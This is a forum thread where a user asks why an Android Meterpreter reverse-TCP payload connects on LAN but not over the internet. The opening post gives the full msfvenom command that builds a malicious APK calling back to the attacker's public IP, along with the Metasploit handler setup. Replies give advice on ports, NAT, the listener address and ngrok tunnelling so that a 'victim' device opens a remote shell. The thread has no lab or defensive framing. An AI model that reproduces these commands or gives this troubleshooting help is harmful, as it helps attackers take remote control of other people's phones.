Forum Thread: Can't Get Meterpreter Session Over WAN

My problem is that I can't connect back to my listener over WAN, I can do it on LAN and it works perfectly. I do that the following way:

msfvenom -p android/meterpreter/reversetcp LHOST=my public IP LPORT=4444 R > apkname.apk

Then I set up the listener as:
use exploit/multi/handler
set payload android/meterpreter/reversetcp
set LHOST my local IP
set LPORT 4444
exploit

I install the apk on the device and I connect to a different network instead of mine, as I've seen other places it should start the meterpreter session but nothing happens.

I forwarded the port 4444 correctly and I'm absolutely sure that my ISP doesn't block that.
Here's a screenshot of the setup, my router/modem is Huawei HG658.

6 Responses

maybe try a different port 4444 is notoriously used for meterpreter. your ISP could be on to that. Otherwise you can always make sure your port forwarding is working properly by setting up port forwarding for ssh and downloading one of the many apps that allow you to ssh to a machine from your phone. If that works then you know it has something to do with the payload or the port itself.

I tried different ports, still nothing. I'm 100% sure about that the port forwarding is correct I've seen others with the same router can forward ports. I have no idea what could I do. Are there other methods to use meterpreter on WAN beside port forwarding?

Are you behind an NAT?
Maybe this helps
https://null-byte.wonderhowto.com/forum/need-help-with-port-forwarding-0162831/

Lets say you try to open a connection from:
A1 -> T-Mobile = Nat -> Nat = doesn't Work,
A1 -> T-Mobile = Nat -> No Nat = Works,
T-Mobile -> T-Mobile = Nat -> No Nat = doesn't Work,(1)
T-Mobile -> T-Mobile = No Nat -> No Nat = Works,(1)

Look on the Members Page from you ISP (not from the AP)
for an Option called "Open Internet" or something like that.

(1) Intern Connections getting blocked instead this Option is on both IP addresses active by all other Connections the Option must only on the server side be activatet.

Hope it Helps!

I turned off NAT, still nothing. I've even tried another router but nothing works. Is there a way to use meterpreter on WAN without port forward or I should forget to ever use this outside of LAN?

Did you get it? Your LHOST when setting up the handler in metasploit should be your public IP address. When you run it, it will say that it failed to bind to the port so it resorts to listening on 0.0.0.0:4444. However, the handler remembers the public IP you typed - it's crucial that you use this.

How did you do it? I used ngrok for port forwarding and when the victim opens the file no metrpreter session is recieved by me even i tried netcat and ssh

Share Your Thoughts

  • Hot
  • Active